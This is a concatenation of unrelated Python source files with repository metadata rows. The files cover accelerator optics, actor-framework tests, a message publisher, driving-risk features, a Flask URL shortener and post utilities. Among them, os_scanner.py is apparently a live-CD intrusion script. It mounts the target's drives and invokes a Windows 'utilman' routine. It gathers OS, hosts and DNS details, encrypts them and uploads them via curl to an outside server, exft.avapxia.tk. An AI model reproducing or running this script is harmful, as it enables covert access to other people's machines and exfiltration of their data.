matrix = self.transport[int(mod(i, self.size))] @ matrix
return torch.inverse(matrix)
def normal(self, probe:torch.Tensor) -> tuple:
"""
Generate uncoupled normal matrix (or matrices) for given locations.
Note, twiss parameters are treated as independent variables in error propagation
Parameters
----------
probe: torch.Tensor
probe locations
Returns
-------
uncoupled normal matrices and error matrices(tuple)
"""
if isinstance(probe, int):
probe = torch.tensor([probe], dtype=torch.int64, device=self.device)
if isinstance(probe, str):
probe = torch.tensor([self.model.name.index(probe)], dtype=torch.int64, device=self.device)
probe = mod(probe, self.size).to(torch.int64)
matrix = torch.zeros((len(probe), 4, 4), dtype=self.dtype, device=self.device)
sigma_matrix = torch.zeros_like(matrix)
matrix[:, 0, 0] = self.bx[probe].sqrt()
matrix[:, 1, 0] = -self.ax[probe]/self.bx[probe].sqrt()
matrix[:, 1, 1] = 1.0/self.bx[probe].sqrt()
matrix[:, 2, 2] = self.by[probe].sqrt()
matrix[:, 3, 2] = -self.ay[probe]/self.by[probe].sqrt()
matrix[:, 3, 3] = 1.0/self.by[probe].sqrt()
sigma_matrix[:, 0, 0] += self.sigma_bx[probe]**2/(4.0*self.bx[probe])
sigma_matrix[:, 1, 0] += self.sigma_ax[probe]**2/self.bx[probe] + self.sigma_bx[probe]**2*self.ax[probe]/(4.0*self.bx[probe]**3)
sigma_matrix[:, 1, 1] += self.sigma_bx[probe]**2/(4.0*self.bx[probe]**3)
sigma_matrix[:, 2, 2] += self.sigma_by[probe]**2/(4.0*self.by[probe])
sigma_matrix[:, 3, 2] += self.sigma_ay[probe]**2/self.by[probe] + self.sigma_by[probe]**2*self.ay[probe]/(4.0*self.by[probe]**3)
sigma_matrix[:, 3, 3] += self.sigma_by[probe]**2/(4.0*self.by[probe]**3)
return (matrix.squeeze(), sigma_matrix.sqrt().squeeze())
def main():
pass
if __name__ == '__main__':
main()
| 42.360933
| 357
| 0.595218
| 10,539
| 72,649
| 3.936142
| 0.033969
| 0.051708
| 0.018176
| 0.010607
| 0.752164
| 0.697274
| 0.652942
| 0.613553
| 0.57749
| 0.548803
| 0
| 0.018076
| 0.261366
| 72,649
| 1,715
| 358
| 42.360933
| 0.75498
| 0.230987
| 0
| 0.388462
| 0
| 0.003846
| 0.03575
| 0.001713
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046154
| false
| 0.001282
| 0.014103
| 0.005128
| 0.112821
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9b44aa1e89f954d4739decd6c84438a72e8d03d
| 5,445
|
py
|
Python
|
thespian/test/test_troupe.py
|
dendron2000/Thespian
|
0acbc5a0803f6d2be3421ea6eb08c6beecbf3802
|
[
"MIT"
] | null | null | null |
thespian/test/test_troupe.py
|
dendron2000/Thespian
|
0acbc5a0803f6d2be3421ea6eb08c6beecbf3802
|
[
"MIT"
] | null | null | null |
thespian/test/test_troupe.py
|
dendron2000/Thespian
|
0acbc5a0803f6d2be3421ea6eb08c6beecbf3802
|
[
"MIT"
] | null | null | null |
import time
import datetime
from thespian.test import *
from thespian.actors import *
from thespian.troupe import troupe
max_listen_wait = datetime.timedelta(seconds=4)
max_ask_wait = datetime.timedelta(seconds=2.5)
class Bee(Actor):
def receiveMessage(self, msg, sender):
if isinstance(msg, tuple):
time.sleep(msg[0])
self.send(sender, msg[1] + ' buzz')
@troupe()
class Hive(Bee):
pass
@troupe()
class Colony(ActorTypeDispatcher):
def receiveMsg_tuple(self, msg, sender):
if not hasattr(self, 'hive'):
self.hive = self.createActor(Hive)
self.asker = []
self.asker.append(sender)
self.send(self.hive, msg)
self.troupe_work_in_progress = True
def receiveMsg_str(self, msg, sender):
self.send(self.asker.pop(), msg)
self.troupe_work_in_progress = bool(getattr(self, 'asker', False))
# Ensure there are more test data elements than workers so that
# some workers get multiple messages
testdata = [(0.5, 'Fizz'), (1, 'Honey'),
(0.25, 'Flower'), (0.75, 'Pollen'),
] + ([(0.005, 'Orchid'), (0.005, 'Rose'),
(0.005, 'Carnation'), (0.005, 'Lily'),
(0.005, 'Daffodil'), (0.005, 'Begonia'),
(0.005, 'Violet'), (0.005, 'Aster'),
] * 3)
def useActorForTest(asys, bee):
# Run multiple passes to allow workers to be reaped between passes
for X in range(2):
print(X)
for each in testdata:
asys.tell(bee, each)
remaining = testdata[:]
for readnum in range(len(testdata)):
rsp = asys.listen(max_listen_wait)
assert rsp
print(str(rsp))
remaining = [R for R in remaining
if not rsp.startswith(R[1])]
assert not remaining
asys.tell(bee, ActorExitRequest())
def testSingleBee(asys):
useActorForTest(asys, asys.createActor(Bee))
def testHive(asys):
useActorForTest(asys, asys.createActor(Hive))
def testColony(asys):
useActorForTest(asys, asys.createActor(Colony))
# ------------------------------------------------------------
class SimpleSourceAuthority(ActorTypeDispatcher):
def receiveMsg_str(self, msg, sender):
self.registerSourceAuthority()
self.send(sender, 'ok')
def receiveMsg_ValidateSource(self, msg, sender):
self.send(sender, ValidatedSource(msg.sourceHash, msg.sourceData))
class LoadWatcher(ActorTypeDispatcher):
def receiveMsg_str(self, msg, sender):
if msg == 'go':
self.notifyOnSourceAvailability(True)
self._tell = sender
self.send(sender, 'ok')
elif msg == 'stop':
self.notifyOnSourceAvailability(False)
self._tell = None
def receiveMsg_LoadedSource(self, loadmsg, sender):
if getattr(self, '_tell', None):
self.send(self._tell, loadmsg.sourceHash)
def receiveMsg_UnloadedSource(self, unloadmsg, sender):
if getattr(self, '_tell', None):
self.send(self._tell, ('unloaded', unloadmsg.sourceHash))
import tempfile, zipfile, os, shutil
@pytest.fixture()
def source_zip(request):
tmpdir = tempfile.mkdtemp()
zipfname = os.path.join(tmpdir, 'hivesrc.zip')
hivezip = zipfile.ZipFile(zipfname, 'w')
hivezip.writestr('__init__.py', '')
hivezip.writestr('forest/__init__.py', '')
hivezip.writestr('forest/clearing/__init__.py', '')
hivezip.writestr('forest/clearing/beehive.py', '''
import time
from thespian.actors import *
from thespian.troupe import troupe
class Bee(Actor):
def receiveMessage(self, msg, sender):
if isinstance(msg, tuple):
time.sleep(msg[0])
self.send(sender, msg[1] + ' buzz')
@troupe()
class Hive(Bee): pass
@troupe()
class Colony(Bee):
def receiveMessage(self, msg, sender):
if isinstance(msg, tuple):
if not hasattr(self, 'hive'):
self.hive = self.createActor(Hive)
self.asker = []
self.asker.append(sender)
self.send(self.hive, msg)
self.troupe_work_in_progress = True
elif isinstance(msg, str):
self.send(self.asker.pop(), msg)
self.troupe_work_in_progress = bool(self.asker)
''')
hivezip.close()
request.addfinalizer(lambda d=tmpdir:
os.path.exists(d) and shutil.rmtree(d))
return zipfname
def testLoadableHive(asys, source_zip):
r = asys.ask(asys.createActor(SimpleSourceAuthority), 'go', max_ask_wait)
assert r == 'ok'
r = asys.ask(asys.createActor(LoadWatcher), 'go', max_ask_wait)
assert r == 'ok'
srchash = asys.loadActorSource(source_zip)
r = asys.listen(max_listen_wait)
assert r == srchash
bee = asys.createActor('forest.clearing.beehive.Hive',
sourceHash=srchash)
useActorForTest(asys, bee)
def testLoadableColony(asys, source_zip):
r = asys.ask(asys.createActor(SimpleSourceAuthority), 'go', max_ask_wait)
assert r == 'ok'
r = asys.ask(asys.createActor(LoadWatcher), 'go', max_ask_wait)
assert r == 'ok'
srchash = asys.loadActorSource(source_zip)
r = asys.listen(max_listen_wait)
assert r == srchash
bee = asys.createActor('forest.clearing.beehive.Colony',
sourceHash=srchash)
useActorForTest(asys, bee)
| 30.082873
| 77
| 0.617998
| 632
| 5,445
| 5.22943
| 0.256329
| 0.026626
| 0.031467
| 0.022693
| 0.552496
| 0.479879
| 0.449924
| 0.410893
| 0.410893
| 0.363086
| 0
| 0.012421
| 0.245914
| 5,445
| 180
| 78
| 30.25
| 0.792499
| 0.040771
| 0
| 0.451852
| 0
| 0
| 0.204676
| 0.046186
| 0
| 0
| 0
| 0
| 0.059259
| 1
| 0.111111
| false
| 0.014815
| 0.066667
| 0
| 0.222222
| 0.014815
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9b739710ac88a977ee95593a167d4e063e1ba18
| 1,197
|
py
|
Python
|
tools/upd.py
|
vladimirivanoviliev/amps-blog-web-grid-bake-off
|
25c24e1fbfc57df4e669487957dd440b338c7847
|
[
"MIT"
] | 3
|
2017-10-21T01:37:03.000Z
|
2021-07-22T16:08:02.000Z
|
tools/upd.py
|
vladimirivanoviliev/amps-blog-web-grid-bake-off
|
25c24e1fbfc57df4e669487957dd440b338c7847
|
[
"MIT"
] | 2
|
2020-01-15T22:50:18.000Z
|
2020-07-19T14:55:28.000Z
|
tools/upd.py
|
vladimirivanoviliev/amps-blog-web-grid-bake-off
|
25c24e1fbfc57df4e669487957dd440b338c7847
|
[
"MIT"
] | 5
|
2020-01-27T13:52:04.000Z
|
2020-10-28T07:38:46.000Z
|
from AMPS import Client
import random
import time
import json
import sys
def main(*args):
publish_rate = None # publish as fast as possible by default
try:
publish_rate = int(args[0])
start = int(args[1])
end = int(args[2])
except Exception:
pass
# set up the client
client = Client('the-publisher')
client.connect('tcp://localhost:9007/amps/json')
client.logon()
while True:
# generate and publish data
current_id = random.randint(start, end)
price_usd = random.randint(20000, 30000)
quantity = random.randint(1, 100)
total = price_usd * quantity
client.publish(
'orders',
json.dumps({
'order_id': current_id,
'name': '>>> TESLA UPDATE <<<',
'price_usd': price_usd,
'quantity': quantity,
'total': total
})
)
if publish_rate is not None and publish_rate > 0:
time.sleep(1.0 / publish_rate)
if __name__ == '__main__':
# detect command line arguments
if len(sys.argv) > 1:
main(*sys.argv[1:])
else:
main()
| 23.94
| 65
| 0.548872
| 140
| 1,197
| 4.55
| 0.5
| 0.086342
| 0.050235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033079
| 0.343358
| 1,197
| 49
| 66
| 24.428571
| 0.777354
| 0.093567
| 0
| 0
| 0
| 0
| 0.102778
| 0.027778
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026316
| false
| 0.026316
| 0.131579
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bbd39d6d8b86209c5aaf7a41e2a233bc9104f2
| 4,815
|
py
|
Python
|
functions/height.py
|
Hilvcha/PINGAN
|
0eb1435750c2ce3dc5de3a50d390aae044360fd5
|
[
"MIT"
] | 7
|
2018-04-01T17:24:56.000Z
|
2021-06-07T09:39:52.000Z
|
functions/height.py
|
Hilvcha/PINGAN
|
0eb1435750c2ce3dc5de3a50d390aae044360fd5
|
[
"MIT"
] | 5
|
2018-03-31T18:24:52.000Z
|
2019-10-09T16:27:49.000Z
|
functions/height.py
|
Hilvcha/PINGAN
|
0eb1435750c2ce3dc5de3a50d390aae044360fd5
|
[
"MIT"
] | 2
|
2020-03-04T08:48:54.000Z
|
2021-06-07T09:39:51.000Z
|
# coding : utf-8
# created by wyj
import numpy as np
import pandas as pd
import math
from utils.feature_utils import df_empty
# TERMINALNO,TIME,TRIP_ID,LONGITUDE,LATITUDE,DIRECTION,HEIGHT,SPEED,CALLSTATE,Y
# 对传入的表按trip_id分组,取每组的海拔的最大连续子数组,对每个人的所有行程的子数组取最大,平均, 方差。
# def max_sub(arr):
# sum = 0
# height = -999
# tempheight = arr.iloc[0]
# for h in arr:
# sum += h - tempheight
# if sum > height:
# height = sum
# if sum < 0:
# sum = 0
# tempheight = h
# arr['secc_inc']=sum
# return arr
def speed_risk(arr):
# 上坡的最大子数组
# sum = 0
# height = -999
tempheight = arr['HEIGHT'].iloc[0]
tempdirection = arr['DIRECTION'].iloc[0]
tempspeed = arr['SPEED'].iloc[0]
# 海拔变化危险系数
height_risk = 0
# 方向变化危险系数
dir_risk = 0
# 通话危险系数
call_risk = 0
for index, row in arr.iterrows():
# sum += row['HEIGHT'] - tempheight
# if sum > height:
# height = sum
# if sum < 0:
# sum = 0
if tempspeed > 0 and row["CALLSTATE"] != 4:
if row["CALLSTATE"] == 0:
call_risk += math.exp(tempspeed / 10) * 0.02
else:
call_risk += math.exp(tempspeed / 10)
D_height = abs(row['HEIGHT'] - tempheight)
D_speed = abs(row['SPEED'] - tempspeed)
height_risk += math.pow(row["SPEED"], D_height / 100)
tempspeed = row['SPEED']
tempheight = row['HEIGHT']
D_direction = min(abs(row["DIRECTION"] - tempdirection), abs(360 + tempdirection - row["DIRECTION"])) / 90.0
dir_risk += math.pow((row["SPEED"] / 10), D_direction / 10)
tempdirection = row['DIRECTION']
# arr['SUCC_INC'] = height
arr["CALLSTATE"] = call_risk
arr['HEIGHT'] = height_risk
arr['DIRECTION'] = dir_risk
return arr
def height_feet(data):
# 加入了危险系数
data_speed_risk = data[["TERMINALNO", 'TRIP_ID', 'HEIGHT', 'SPEED', 'DIRECTION', "CALLSTATE"]].groupby(
["TERMINALNO", 'TRIP_ID'],
as_index=False).apply(
speed_risk)
# 为tripid聚合
data_speed_risk = data_speed_risk[
["TERMINALNO", 'TRIP_ID', 'HEIGHT', 'DIRECTION', "CALLSTATE"]].groupby(
["TERMINALNO", 'TRIP_ID'],
as_index=False).first()
# max_data = data_speed_risk[["TERMINALNO", 'SUCC_INC']].groupby(["TERMINALNO"], as_index=True).max()
# mean_data = data_speed_risk[["TERMINALNO", 'SUCC_INC']].groupby(["TERMINALNO"], as_index=True).mean()
# var_data = data_speed_risk[["TERMINALNO", 'SUCC_INC']].groupby(["TERMINALNO"], as_index=True).var()
# train_data=pd.concat([max_data, mean_data, var_data], axis=1)
# train_data.columns = ['MAX_SUCC_INC', 'MEAN_SUCC_INC', 'VAR_SUCC_INC']
train_data = data_speed_risk[["TERMINALNO", 'HEIGHT', 'DIRECTION', "CALLSTATE"]].groupby(
["TERMINALNO"],
as_index=True).sum()
# 时间统计特征
height_sta = data[['TERMINALNO', "HEIGHT"]].groupby(['TERMINALNO']).agg([np.mean, np.var])
# 最大行程时间
max_time = data[['TERMINALNO', "TRIP_ID", "TIME"]].groupby(["TERMINALNO", 'TRIP_ID'], as_index=False).count()
max_time = max_time[['TERMINALNO', 'TIME']].groupby(["TERMINALNO"]).max()
# 速度统计特征
speed_sta = data[['TERMINALNO', "SPEED"]].groupby(['TERMINALNO']).agg([np.mean, np.max])
# # 平均下
# height_down = data[['TERMINALNO', "TRIP_ID", "HEIGHT"]].groupby(["TERMINALNO", 'TRIP_ID'], as_index=False).agg(
# maxSubArray)
# height_down = height_down[['TERMINALNO', "HEIGHT"]].groupby(['TERMINALNO']).agg([np.mean, np.min])
# # 平均上坡
# height_up = data[['TERMINALNO', "TRIP_ID", "HEIGHT"]].groupby(["TERMINALNO", 'TRIP_ID'], as_index=False).agg(
# minSubArray)
# height_up = height_up[['TERMINALNO', "HEIGHT"]].groupby(['TERMINALNO']).agg([np.mean, np.max])
train_data = pd.concat([train_data, height_sta, max_time, speed_sta,], axis=1)
train_data.columns = ['height_risk', 'direction_risk', "callstate_risk", "height_mean", "height_var", "max_time",
"speed_mean", "speed_max",]
return train_data
# 'TERMINALNO', 'maxTime', 'phonerisk', 'dir_risk', 'height_risk', 'speed_max',
# 'speed_mean', 'height_mean', 'Zao', 'Wan', 'Sheye'
def maxSubArray(arr):
height = 99999
sum = 0
tempheight = arr.iloc[0]
for h in arr:
sum += h - tempheight
if sum < height:
height = sum
if sum > 0:
sum = 0
tempheight = h
return height
def minSubArray(arr):
height = -99999
sum = 0
tempheight = arr.iloc[0]
for h in arr:
sum += h - tempheight
if sum > height:
height = sum
if sum < 0:
sum = 0
tempheight = h
return height
| 32.979452
| 117
| 0.586708
| 586
| 4,815
| 4.638225
| 0.18942
| 0.087564
| 0.058867
| 0.042311
| 0.459529
| 0.389257
| 0.355776
| 0.33039
| 0.281825
| 0.242826
| 0
| 0.017481
| 0.251506
| 4,815
| 145
| 118
| 33.206897
| 0.736681
| 0.353894
| 0
| 0.246575
| 0
| 0
| 0.158875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054795
| false
| 0
| 0.054795
| 0
| 0.164384
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bc10c08079eec1973b577a0d5e59f56835d97e
| 2,850
|
py
|
Python
|
live_cd_scripts/os_scanner.py
|
ForbiddenApplePy/applepy
|
4eb0965f7f634b0f340beee54dce09c12e3e4f54
|
[
"WTFPL"
] | null | null | null |
live_cd_scripts/os_scanner.py
|
ForbiddenApplePy/applepy
|
4eb0965f7f634b0f340beee54dce09c12e3e4f54
|
[
"WTFPL"
] | null | null | null |
live_cd_scripts/os_scanner.py
|
ForbiddenApplePy/applepy
|
4eb0965f7f634b0f340beee54dce09c12e3e4f54
|
[
"WTFPL"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import json
import windows_utilman
import pyAesCrypt
import requests
from secureCrypt import cryptResult
os.system('loadkeys fr')
os.system('lsblk > result.txt')
if os.path.exists('/mnt/targetDrive'):
pass
else:
os.system('mkdir /mnt/targetDrive')
def parse(file_name):
# Listing all drives and removing special char from the command return and saving them to a file
result = []
with open(file_name) as input_file:
for line in input_file:
temp_arr = line.split(' ')
for item in temp_arr:
if '└─' in item or '├─' in item:
result.append(item.replace('└─', '').replace('├─', ''))
os.remove(file_name)
return result
def check_for_os(list):
# Checking for OS installed on the drive
os_list = {'Os': 'location'}
hosts = {'Host': 'address'}
servers = {"DNS": "address"}
for drive in drives_list:
os.system('mount /dev/%s /mnt/targetDrive' % (drive))
print('Looking for OS on '+drive+'...\n')
if os.path.isdir('/mnt/targetDrive/Windows'):
# Checking for Windows installation
os_list['Windows'] = drive
windows_utilman.utilman()
elif os.path.isdir('/mnt/targetDrive/etc'):
# Looking for Linux and grabbing files
f = open('/mnt/targetDrive/etc/issue')
for x in f:
# Listing distros
x = x.split()
x = x[:len(x)-2]
x = ' '.join(x)
if x != '':
os_list[x] = drive
f = open('/etc/hosts')
for x in f:
# Checking hosts
x = x.split()
hosts[x[1]] = x[0]
f = open('/etc/resolv.conf')
for x in f:
# Checking DNS
x = x.split()
if x:
if x[0] != "#":
if x[0] == "options":
pass
else:
servers[x[0]] = x[1]
results = []
results.append(os_list)
results.append(hosts)
results.append(servers)
return results
# Program starts here
drives_list = parse("result.txt")
results = check_for_os(drives_list)
# Saving results as json file
json = json.dumps(results)
if os.path.exists('results.json'):
f = open('results.json', 'w')
else:
f = open('results.json', 'x')
f.write(json)
f.close()
# Crypting file before sending it to our server and removing the base file just in case
cryptResult("results.json")
os.remove("results.json")
# Sending file to the server
os.system('curl -i -X POST -H "Content-Type: multipart/form-data" -F "host=test" -F "file=@results.json.aes" https://exft.avapxia.tk/')
| 29.6875
| 135
| 0.545614
| 369
| 2,850
| 4.181572
| 0.365854
| 0.054439
| 0.015554
| 0.01361
| 0.051847
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004139
| 0.321754
| 2,850
| 95
| 136
| 30
| 0.789964
| 0.157193
| 0
| 0.15493
| 0
| 0.014085
| 0.195061
| 0.030975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0.028169
| 0.098592
| 0
| 0.15493
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bd49e911285196dc03e66b536b44da7fb8a285
| 2,336
|
py
|
Python
|
app/views.py
|
taeram/idiocy
|
01acf569785f0294540a1b0214b8eccd81818b9c
|
[
"MIT"
] | null | null | null |
app/views.py
|
taeram/idiocy
|
01acf569785f0294540a1b0214b8eccd81818b9c
|
[
"MIT"
] | 1
|
2019-12-06T21:20:10.000Z
|
2019-12-06T21:20:11.000Z
|
app/views.py
|
taeram/idiocy
|
01acf569785f0294540a1b0214b8eccd81818b9c
|
[
"MIT"
] | null | null | null |
from app import app
import os
from flask import abort, \
redirect, \
render_template, \
request, \
send_from_directory, \
url_for
from .helpers import generate_code, \
is_valid_url, \
is_authenticated, \
strip_file_extension
from .database import db, \
Urls
from .filters import strip_www
@app.route('/favicon.ico')
def favicon():
return send_from_directory(os.path.join(app.root_path, 'static'), 'favicon.png', mimetype='image/png')
@app.route('/', methods=['GET', 'POST', 'HEAD'])
def shorten():
if request.method == 'GET':
return render_template('hello.html')
elif request.method == 'POST':
if not is_authenticated():
return app.response_class(response='{"error": "Invalid API key"}', mimetype='application/json', status=403)
url = request.form['url'].strip()
if not is_valid_url(url):
return app.response_class(response='{"error": "Invalid URL"}', mimetype='application/json', status=403)
# Has this URL been previously stored?
row = db.session.query(Urls).\
filter(Urls.url == url).\
first()
if not row:
row = Urls(url=url, code=generate_code())
db.session.add(row)
db.session.commit()
return strip_www(url_for('bounce', code=row.code, _external=True))
@app.route('/<code>', methods=['GET', 'DELETE'])
def bounce(code):
code = strip_file_extension(code)
row = db.session.query(Urls).\
filter(Urls.code == code).\
first()
if not row:
abort(404)
if request.method == 'GET':
row.clicks += 1
db.session.add(row)
db.session.commit()
return redirect(row.url)
elif request.method == 'DELETE':
db.session.delete(row);
db.session.commit()
return strip_www(url_for('bounce', code=row.code, _external=True))
@app.route('/list', methods=['GET'])
def list():
urls = db.session.query(Urls).\
order_by(Urls.created).\
limit(25).\
all()
return render_template('list.html', urls=urls)
| 31.146667
| 119
| 0.550514
| 266
| 2,336
| 4.718045
| 0.330827
| 0.064542
| 0.047809
| 0.043028
| 0.3251
| 0.274104
| 0.274104
| 0.157769
| 0.119522
| 0.119522
| 0
| 0.007467
| 0.312072
| 2,336
| 74
| 120
| 31.567568
| 0.773491
| 0.015411
| 0
| 0.25
| 0
| 0
| 0.090513
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.1
| 0.016667
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9bfd30a608b29439adc950385f985d929b086eb
| 1,443
|
py
|
Python
|
prepare_dataset/filter_ratio_and_warnings.py
|
Florian-Barthel/stylegan2
|
4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8
|
[
"BSD-Source-Code"
] | null | null | null |
prepare_dataset/filter_ratio_and_warnings.py
|
Florian-Barthel/stylegan2
|
4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8
|
[
"BSD-Source-Code"
] | null | null | null |
prepare_dataset/filter_ratio_and_warnings.py
|
Florian-Barthel/stylegan2
|
4ef87038bf9370596cf2b729e1d1a1bc3ebcddd8
|
[
"BSD-Source-Code"
] | null | null | null |
from tqdm import tqdm
import shutil
import os
from PIL import Image
import warnings
src_folder = '../../modified_datasets/cars_flat'
dest_folder = '../../modified_datasets/cars_flat_ratio_warnings'
if not os.path.exists(dest_folder):
os.makedirs(dest_folder)
num_kept = 0
num_removed = 0
num_corrupt_EXIF = 0
for file in tqdm(os.listdir(src_folder)):
if file.lower().endswith(".jpg") or file.lower().endswith(".jpeg") or file.lower().endswith(".png"):
src_img = src_folder + '/' + file
dest_img = dest_folder + '/' + file
src_label = src_folder + '/' + file + '.json'
dest_label = dest_folder + '/' + file + '.json'
with warnings.catch_warnings() as my_warning:
warnings.simplefilter('error', UserWarning)
try:
img = Image.open(src_img)
w, h = img.size
if w < h:
print('removed invalid ratio')
num_removed += 1
continue
shutil.copyfile(src_img, dest_img)
if os.path.exists(src_label):
shutil.copyfile(src_label, dest_label)
num_kept += 1
except:
print('removed invalid format')
num_corrupt_EXIF += 1
print('Summary:')
print('removed corrupt_exif: ' + str(num_corrupt_EXIF))
print('removed: ' + str(num_removed))
print('kept: ' + str(num_kept))
| 31.369565
| 104
| 0.582121
| 176
| 1,443
| 4.545455
| 0.352273
| 0.0625
| 0.0525
| 0.065
| 0.075
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005917
| 0.297297
| 1,443
| 45
| 105
| 32.066667
| 0.783037
| 0
| 0
| 0
| 0
| 0
| 0.139293
| 0.056133
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.131579
| 0
| 0.131579
| 0.157895
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c1766ed44cd38de086fdbbfdce35e66d2ab6f5
| 2,548
|
py
|
Python
|
src/backend/apps/posts/utils.py
|
Vixx-X/ati-project
|
0ef80772a6fc3807e401cf58b9e15f3628373383
|
[
"MIT"
] | null | null | null |
src/backend/apps/posts/utils.py
|
Vixx-X/ati-project
|
0ef80772a6fc3807e401cf58b9e15f3628373383
|
[
"MIT"
] | 61
|
2021-06-10T03:27:06.000Z
|
2022-03-12T01:01:34.000Z
|
src/backend/apps/posts/utils.py
|
Vixx-X/ati-project
|
0ef80772a6fc3807e401cf58b9e15f3628373383
|
[
"MIT"
] | null | null | null |
from mongoengine.queryset.visitor import Q
from backend.apps.posts.models import Post
from backend.apps.user.signals import check_comment_signal
from backend.apps.user.utils import are_friends
def _get_two_last_obj_with_path(path_list):
size = len(path_list)
if not size:
raise Exception("path_list cannot be empty")
pk = path_list[0]
if size == 1:
post = Post.objects.get(id=pk)
return post, post
parent, son = _get_two_last_obj_with_path(path_list[1:])
parent = son
son = son.comments.get(id=pk)
return parent, son
def get_two_last_obj_with_path(path):
return _get_two_last_obj_with_path(path.split("/")[::-1])
def get_object_by_path(path):
_, son = _get_two_last_obj_with_path(path)
return son
def save_comment_by_path(path, comment):
"""
Saving comment inserting it in root comment or post, given that we
only have 2-depth comments
"""
parent, son = get_two_last_obj_with_path(path)
if isinstance(parent, Post) and not isinstance(son, Post):
son.comments.append(comment)
else:
parent.comments.append(comment)
post = get_object_by_path(path.split("/")[0])
post.save()
# notify son author
check_comment_signal.send(comment.author, son.author)
def get_comments(obj, page=1, size=10, path=None):
start = (page - 1) * size
end = start + size
raiz = []
for com in obj.comments[start:end]:
curr = com.as_dict()
childs = []
for child in com.comments[: size / 2]:
c = child.as_dict()
c["reply"] = path.split("/") + [curr["id"], c["id"]]
childs.append(c)
setattr(curr, "comments", childs)
curr["reply"] = path.split("/") + [curr["id"]]
junior = {"comments": curr, "more": path.split("/") + [curr["id"]]}
raiz.append(junior)
ret = {"comments": raiz}
if len(raiz) == size:
ret["more"] = path.split("/")
return raiz
def get_comments_by_path(path, page, size):
comment = get_object_by_path(path)
return get_comments(comment, page, size, path)
def get_main_posts(requester):
return Post.objects.filter(
Q(public=True) or Q(author__in=requester.friends)
).order_by("-time_created")
def get_posts_by_user(user, requester):
friends = are_friends(user, requester)
priv_filter = Q() if friends else (Q(public=True) | Q(author=requester))
filter_param = Q(author=user) & priv_filter
return Post.objects.filter(filter_param).order_by("-time_created")
| 29.627907
| 76
| 0.654631
| 367
| 2,548
| 4.326975
| 0.26703
| 0.055416
| 0.037783
| 0.049118
| 0.185139
| 0.124055
| 0.124055
| 0.108312
| 0.042821
| 0
| 0
| 0.005497
| 0.214678
| 2,548
| 85
| 77
| 29.976471
| 0.788106
| 0.043956
| 0
| 0
| 0
| 0
| 0.044288
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131148
| false
| 0
| 0.065574
| 0.032787
| 0.327869
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9c3402cd5440828a3062f0ffd949c6878c6a821
| 5,340
|
py
|
Python
|
openslides_backend/action/actions/projector/toggle.py
|
ostcar/openslides-backend
|
e6ceac497c37a1e3e7f408c6cfb29cf21d985b4c
|
[
"MIT"
] | 5
|
2020-01-20T13:57:15.000Z
|
2021-03-27T14:14:44.000Z
|
openslides_backend/action/actions/projector/toggle.py
|
ostcar/openslides-backend
|
e6ceac497c37a1e3e7f408c6cfb29cf21d985b4c
|
[
"MIT"
] | 859
|
2020-01-11T22:58:37.000Z
|
2022-03-30T14:54:06.000Z
|
openslides_backend/action/actions/projector/toggle.py
|
ostcar/openslides-backend
|
